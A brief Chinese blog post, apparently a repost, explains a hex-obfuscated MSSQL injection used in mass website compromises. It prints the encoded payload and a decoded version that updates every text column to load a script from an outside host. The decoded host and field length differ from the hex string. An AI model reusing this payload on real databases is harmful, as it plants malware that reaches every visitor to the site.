zoukankan      html  css  js  c++  java
  • 16进制 SQL注入

    dEcLaRe @s vArChAr(8000) sEt @s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72 eXeC(@s);

    这个就是互联网泛滥的挂马专用代码,专门给过滤法的程序服务的。

    把16进制翻译过来
    DECLARE @T VARCHAR(255),@C VARCHAR(255)
    DECLARE Table_Cursor CURSOR FOR
    SELECT a.name,b.name FROM sysobjects a,syscolumns b
    WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C END
    CLOSE Table_Cursor DEALLOCATE Table_Cursor

    看来原来的代码给16进制掩护得多少好。

  • 相关阅读:
    k8s官网 基础知识入门教程
    Mac安装minikube
    docker下创建crontab定时任务失败
    docker save提示no space left on device错误
    cx_Oracle读写clob
    Ossec添加Agent端流程总结
    ossec变更alert等级及配置邮件预警
    linux安全配置检查脚本_v0.5
    linux命令返回值的妙用
    Shell脚本判断内容为None的方式
  • 原文地址:https://www.cnblogs.com/zzxap/p/2175563.html
Copyright © 2011-2022 走看看